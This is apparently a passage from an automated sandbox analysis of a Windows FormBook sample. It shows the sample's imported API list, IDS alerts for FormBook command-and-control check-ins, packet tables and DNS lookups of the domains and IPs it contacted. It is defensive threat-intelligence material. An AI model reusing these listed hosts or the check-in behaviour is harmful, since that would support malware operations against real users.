                                                                              KERNEL32.dllRtlUnwind, GetStartupInfoA, GetCommandLineA, ExitProcess, RaiseException, HeapAlloc, HeapFree, TerminateProcess, HeapReAlloc, HeapSize, GetACP, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, SetHandleCount, GetStdHandle, GetFileType, HeapDestroy, HeapCreate, VirtualFree, SetUnhandledExceptionFilter, VirtualAlloc, IsBadWritePtr, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, IsBadReadPtr, IsBadCodePtr, GetProfileStringA, WriteFile, GetCurrentProcess, SetErrorMode, WritePrivateProfileStringA, GetOEMCP, GetCPInfo, GetProcessVersion, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalFree, LocalAlloc, SizeofResource, MultiByteToWideChar, WideCharToMultiByte, InterlockedIncrement, GetLastError, GlobalFlags, lstrcpynA, MulDiv, SetLastError, InterlockedDecrement, CloseHandle, GetModuleFileNameA, VirtualProtect, GlobalAlloc, GetCurrentThread, lstrlenA, lstrcmpA, LoadLibraryA, FreeLibrary, GetVersion, lstrcatA, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcpyA, GetModuleHandleA, GetProcAddress, GlobalLock, GlobalUnlock, GlobalFree, LockResource, FindResourceA, LoadResource, lstrcmpiA, GetEnvironmentStringsW
                                                                              USER32.dllPeekMessageA, GetSysColor, SendDlgItemMessageA, UpdateWindow, PostMessageA, IsDlgButtonChecked, IsDialogMessageA, SetWindowTextA, ShowWindow, EnableMenuItem, CheckMenuItem, SetMenuItemBitmaps, ModifyMenuA, GetMenuState, LoadBitmapA, GetMenuCheckMarkDimensions, PostQuitMessage, SetCursor, ValidateRect, TranslateMessage, GetMessageA, ClientToScreen, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, DrawTextA, LoadCursorA, GetSysColorBrush, DestroyMenu, LoadStringA, IsWindowVisible, GetTopWindow, MessageBoxA, GetCapture, DispatchMessageA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenuItemCount, GetSubMenu, GetMenuItemID, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, GetKeyState, DefWindowProcA, CreateWindowExA, SetWindowsHookExA, CallNextHookEx, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, GetLastActivePopup, GetForegroundWindow, SetForegroundWindow, RegisterWindowMessageA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetNextDlgTabItem, EndDialog, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindowEnabled, GetParent, GetWindow, GetClassNameA, MoveWindow, IsIconic, DrawIcon, LoadIconA, SendMessageA, GrayStringA, GetSystemMetrics, ScreenToClient, PtInRect, GetDC, DrawFrameControl, ReleaseDC, InvalidateRect, GetCursorPos, EqualRect, SetCapture, ReleaseCapture, GetMenu, AdjustWindowRect, EnableWindow, GetWindowRect, GetWindowLongA, SetPropA, UnregisterClassA, HideCaret, ShowCaret, SetWindowPos, GetPropA, CallWindowProcA, BeginDeferWindowPos, MapWindowPoints, DeferWindowPos, EndDeferWindowPos, IsWindow, GetDlgItem, GetFocus, SetFocus, AdjustWindowRectEx, WinHelpA, CopyRect, SetWindowLongA, RemovePropA, GetClientRect, IsWindowUnicode, CharNextA, InflateRect, DefDlgProcA, DrawFocusRect, ExcludeUpdateRgn, GetClassLongA
                                                                              GDI32.dllGetStockObject, SetBkMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, IntersectClipRect, SelectObject, DeleteObject, GetDeviceCaps, CreateSolidBrush, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, RestoreDC, SaveDC, DeleteDC, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateDIBitmap, PatBlt, GetTextExtentPointA, BitBlt, CreateCompatibleDC
                                                                              comdlg32.dllGetOpenFileNameA
                                                                              WINSPOOL.DRVDocumentPropertiesA, ClosePrinter, OpenPrinterA
                                                                              ADVAPI32.dllRegSetValueExA, RegCloseKey, RegOpenKeyExA, RegCreateKeyExA
                                                                              COMCTL32.dll

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              04/12/21-14:42:55.970349TCP1201ATTACK-RESPONSES 403 Forbidden804971234.102.136.180192.168.2.7
                                                                              04/12/21-14:43:29.099579TCP1201ATTACK-RESPONSES 403 Forbidden804972834.102.136.180192.168.2.7
                                                                              04/12/21-14:43:40.083059TCP1201ATTACK-RESPONSES 403 Forbidden804973334.102.136.180192.168.2.7
                                                                              04/12/21-14:43:50.506458TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.7
                                                                              04/12/21-14:43:55.885724TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7204.11.56.48
                                                                              04/12/21-14:43:55.885724TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7204.11.56.48
                                                                              04/12/21-14:43:55.885724TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7204.11.56.48

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 12, 2021 14:42:39.167387962 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:39.589288950 CEST804970547.105.113.141192.168.2.7
                                                                              Apr 12, 2021 14:42:39.589587927 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:39.589682102 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:40.012196064 CEST804970547.105.113.141192.168.2.7
                                                                              Apr 12, 2021 14:42:40.012223959 CEST804970547.105.113.141192.168.2.7
                                                                              Apr 12, 2021 14:42:40.012417078 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:40.055970907 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:40.441804886 CEST804970547.105.113.141192.168.2.7
                                                                              Apr 12, 2021 14:42:55.791845083 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:55.832835913 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:42:55.832917929 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:55.833060026 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:55.873897076 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:42:55.970349073 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:42:55.970376015 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:42:55.970525980 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:55.972614050 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:56.013549089 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:06.087716103 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:06.316555977 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:06.316780090 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:06.316806078 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:06.545553923 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:06.805433035 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:07.075186014 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:09.141789913 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:09.141813040 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:09.142075062 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:09.142097950 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:11.909854889 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.049487114 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.049683094 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.049977064 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.192271948 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192353964 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192392111 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192430019 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192467928 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192502975 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192529917 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192528963 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.192778111 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.192960978 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.332376957 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:17.302906036 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.353419065 CEST8049726160.153.136.3192.168.2.7
                                                                              Apr 12, 2021 14:43:17.353622913 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.353806019 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.404323101 CEST8049726160.153.136.3192.168.2.7
                                                                              Apr 12, 2021 14:43:17.404589891 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.404681921 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.458651066 CEST8049726160.153.136.3192.168.2.7
                                                                              Apr 12, 2021 14:43:23.329819918 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:23.580332994 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:23.581245899 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:23.581275940 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:23.827841043 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:23.831491947 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:23.831516027 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:23.831702948 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:23.831736088 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:24.032521963 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:24.032763958 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:24.074176073 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:28.920898914 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:28.962025881 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:28.962302923 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:28.962619066 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:29.003592014 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:29.099579096 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:29.099618912 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:29.099925995 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:29.100064039 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:29.140958071 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:39.904767036 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:39.945777893 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:39.945981026 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:39.946073055 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:39.986855030 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:40.083059072 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:40.083096981 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:40.083825111 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:40.083853006 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:40.125268936 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.326803923 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.369370937 CEST804973634.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.369771957 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.370038033 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.410672903 CEST804973634.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.506458044 CEST804973634.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.506483078 CEST804973634.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.507009983 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.507102013 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.547902107 CEST804973634.102.136.180192.168.2.7

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 12, 2021 14:41:19.943381071 CEST6335453192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:20.002774954 CEST53633548.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:20.252338886 CEST5312953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:20.301002026 CEST53531298.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:21.063261032 CEST6245253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:21.114973068 CEST53624528.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:28.611020088 CEST5782053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:28.660525084 CEST53578208.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:30.808311939 CEST5084853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:30.856991053 CEST53508488.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:40.533992052 CEST6124253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:40.592926025 CEST53612428.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:52.152436018 CEST5856253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:52.211227894 CEST53585628.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:58.336416006 CEST5659053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:58.388233900 CEST53565908.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:59.289062023 CEST6050153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:59.346138000 CEST53605018.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:15.167821884 CEST5377553192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:15.226773024 CEST53537758.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:24.988890886 CEST5183753192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:25.040378094 CEST53518378.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:30.155750036 CEST5541153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:30.204756021 CEST53554118.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:30.601542950 CEST6366853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:30.660084963 CEST53636688.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:34.022248030 CEST5464053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:34.084567070 CEST53546408.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:39.103795052 CEST5873953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:39.162935972 CEST53587398.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:45.073788881 CEST6033853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:45.164273024 CEST53603388.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:50.307725906 CEST5871753192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:50.700989962 CEST53587178.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:50.747783899 CEST5976253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:50.813944101 CEST53597628.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:52.261464119 CEST5432953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:52.360915899 CEST53543298.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:53.079898119 CEST5805253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:53.183572054 CEST53580528.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:54.075596094 CEST5400853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:54.178920984 CEST53540088.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:54.820456028 CEST5945153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:54.877789021 CEST53594518.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:55.714117050 CEST6456953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:55.714190006 CEST5291453192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:55.765783072 CEST53645698.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:55.790788889 CEST53529148.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:56.540268898 CEST5281653192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:56.597579002 CEST53528168.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:57.228183985 CEST5078153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:57.285253048 CEST53507818.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:58.271996021 CEST5423053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:58.321521997 CEST53542308.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:59.478202105 CEST5491153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:59.535201073 CEST53549118.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:00.000978947 CEST4995853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:00.058001041 CEST53499588.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:02.981076956 CEST5086053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:03.029719114 CEST53508608.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:03.104815006 CEST5045253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:03.163594007 CEST53504528.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:06.027095079 CEST5973053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:06.085716963 CEST53597308.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:11.829840899 CEST5931053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:11.907810926 CEST53593108.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:17.205431938 CEST5191953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:17.301090002 CEST53519198.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:22.446202040 CEST6429653192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:23.328795910 CEST53642968.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:28.843533993 CEST5668053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:28.919328928 CEST53566808.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:33.305284977 CEST5882053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:33.321546078 CEST6098353192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:33.354269981 CEST53588208.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:33.373353004 CEST53609838.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:34.106187105 CEST4924753192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:34.382898092 CEST5228653192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:34.440388918 CEST53522868.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:34.814937115 CEST53492478.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:35.537502050 CEST5606453192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:35.589127064 CEST53560648.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:39.826991081 CEST6374453192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:39.904122114 CEST53637448.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:42.907236099 CEST6145753192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:42.957482100 CEST53614578.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:45.090725899 CEST5836753192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:45.153116941 CEST53583678.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:50.263797045 CEST6059953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:50.325995922 CEST53605998.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:43:55.518405914 CEST5957153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:43:55.720928907 CEST53595718.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:44:01.391340971 CEST5268953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:44:01.439821959 CEST53526898.8.8.8192.168.2.7

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Apr 12, 2021 14:42:34.022248030 CEST192.168.2.78.8.8.80x3d29Standard query (0)www.modomo.amsterdamA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:42:39.103795052 CEST192.168.2.78.8.8.80xc6afStandard query (0)www.zq2003.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:42:50.307725906 CEST192.168.2.78.8.8.80xd981Standard query (0)www.gxjljc.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:42:55.714190006 CEST192.168.2.78.8.8.80xde48Standard query (0)www.betralifcannabis.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:06.027095079 CEST192.168.2.78.8.8.80x69ebStandard query (0)www.2elden.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:11.829840899 CEST192.168.2.78.8.8.80x3f94Standard query (0)www.landreclaim.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:17.205431938 CEST192.168.2.78.8.8.80xaa2aStandard query (0)www.rememberingedward.infoA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:22.446202040 CEST192.168.2.78.8.8.80xd51eStandard query (0)www.chuanyangwenhua.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:28.843533993 CEST192.168.2.78.8.8.80xb9cbStandard query (0)www.bestflowersandgifts.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:34.106187105 CEST192.168.2.78.8.8.80xc823Standard query (0)www.mirgran.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:39.826991081 CEST192.168.2.78.8.8.80x135dStandard query (0)www.sci-mfg.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:45.090725899 CEST192.168.2.78.8.8.80xf5a2Standard query (0)www.yashasvsaluja.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:50.263797045 CEST192.168.2.78.8.8.80xcc30Standard query (0)www.sexichef.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:55.518405914 CEST192.168.2.78.8.8.80x5ffcStandard query (0)www.realunitystudio.comA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:44:01.391340971 CEST192.168.2.78.8.8.80xbe57Standard query (0)www.modomo.amsterdamA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Apr 12, 2021 14:42:34.084567070 CEST8.8.8.8192.168.2.70x3d29Name error (3)www.modomo.amsterdamnonenoneA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:42:39.162935972 CEST8.8.8.8192.168.2.70xc6afNo error (0)www.zq2003.com47.105.113.141A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:42:50.700989962 CEST8.8.8.8192.168.2.70xd981Name error (3)www.gxjljc.comnonenoneA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:42:55.790788889 CEST8.8.8.8192.168.2.70xde48No error (0)www.betralifcannabis.combetralifcannabis.comCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:42:55.790788889 CEST8.8.8.8192.168.2.70xde48No error (0)betralifcannabis.com34.102.136.180A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:06.085716963 CEST8.8.8.8192.168.2.70x69ebNo error (0)www.2elden.com156.226.160.56A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:11.907810926 CEST8.8.8.8192.168.2.70x3f94No error (0)www.landreclaim.com198.50.252.64A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:17.301090002 CEST8.8.8.8192.168.2.70xaa2aNo error (0)www.rememberingedward.inforememberingedward.infoCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:43:17.301090002 CEST8.8.8.8192.168.2.70xaa2aNo error (0)rememberingedward.info160.153.136.3A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:23.328795910 CEST8.8.8.8192.168.2.70xd51eNo error (0)www.chuanyangwenhua.comchuanyangw21.h.bdy.smp11.cnCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:43:23.328795910 CEST8.8.8.8192.168.2.70xd51eNo error (0)chuanyangw21.h.bdy.smp11.cnbdy.gz01.bdysite.comCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:43:23.328795910 CEST8.8.8.8192.168.2.70xd51eNo error (0)bdy.gz01.bdysite.comgz01.bch.baidu-itm.comCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:43:23.328795910 CEST8.8.8.8192.168.2.70xd51eNo error (0)gz01.bch.baidu-itm.com14.215.190.65A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:28.919328928 CEST8.8.8.8192.168.2.70xb9cbNo error (0)www.bestflowersandgifts.combestflowersandgifts.comCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:43:28.919328928 CEST8.8.8.8192.168.2.70xb9cbNo error (0)bestflowersandgifts.com34.102.136.180A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:34.814937115 CEST8.8.8.8192.168.2.70xc823Server failure (2)www.mirgran.comnonenoneA (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:39.904122114 CEST8.8.8.8192.168.2.70x135dNo error (0)www.sci-mfg.comsci-mfg.comCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:43:39.904122114 CEST8.8.8.8192.168.2.70x135dNo error (0)sci-mfg.com34.102.136.180A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:45.153116941 CEST8.8.8.8192.168.2.70xf5a2No error (0)www.yashasvsaluja.comyashasvsaluja.comCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:43:45.153116941 CEST8.8.8.8192.168.2.70xf5a2No error (0)yashasvsaluja.com192.0.78.25A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:45.153116941 CEST8.8.8.8192.168.2.70xf5a2No error (0)yashasvsaluja.com192.0.78.24A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:50.325995922 CEST8.8.8.8192.168.2.70xcc30No error (0)www.sexichef.comsexichef.comCNAME (Canonical name)IN (0x0001)
                                                                              Apr 12, 2021 14:43:50.325995922 CEST8.8.8.8192.168.2.70xcc30No error (0)sexichef.com34.102.136.180A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:43:55.720928907 CEST8.8.8.8192.168.2.70x5ffcNo error (0)www.realunitystudio.com204.11.56.48A (IP address)IN (0x0001)
                                                                              Apr 12, 2021 14:44:01.439821959 CEST8.8.8.8192.168.2.70xbe57Name error (3)www.modomo.amsterdamnonenoneA (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • www.zq2003.com
                                                                              • www.betralifcannabis.com
                                                                              • www.2elden.com
                                                                              • www.landreclaim.com
                                                                              • www.rememberingedward.info
                                                                              • www.chuanyangwenhua.com
                                                                              • www.bestflowersandgifts.com
                                                                              • www.sci-mfg.com
                                                                              • www.sexichef.com

                                                                              HTTP Packets

